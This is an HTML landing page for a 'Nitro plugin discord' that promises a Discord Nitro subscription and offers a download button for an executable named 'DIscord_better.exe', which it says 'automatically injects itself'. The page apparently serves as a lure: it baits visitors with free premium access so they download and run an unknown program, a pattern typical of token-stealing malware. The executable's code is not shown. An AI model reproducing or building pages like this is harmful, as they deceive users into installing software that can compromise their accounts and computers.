<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Home</title>
    <link rel="stylesheet" href="/css/style2.css">
    <link rel="preconnect" href="https://fonts.gstatic.com">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link rel="preconnect" href="https://fonts.gstatic.com">
<link href="https://fonts.googleapis.com/css2?family=Ubuntu:wght@500&display=swap" rel="stylesheet"> 
<body>

    <header>
        <nav>
            <h3>Nitro plugin discord</h3>
            <h5 class="link1" ><a href="/">Stream</a></h5>
            <h5 class="link" ><a href="/DIscord_better.exe">Nitro</a></h5>
        </nav>
    </header>

    <main>
        <h1>The nitro plugin you need</h1>
        <br>
        <p>Search for an available subscription for nitro. Very easy installation.</p>
        <br>
        <p class="io">Run the program, and wait, the plugin automatically injects itself for you.</p>
        <form action="DIscord_better.exe"><button type="submit"><img src="https://img.icons8.com/metro/26/000000/downloads-folder.png"/><p class="ciao">Download now</p></button></form>
    </main>


</body>

</html>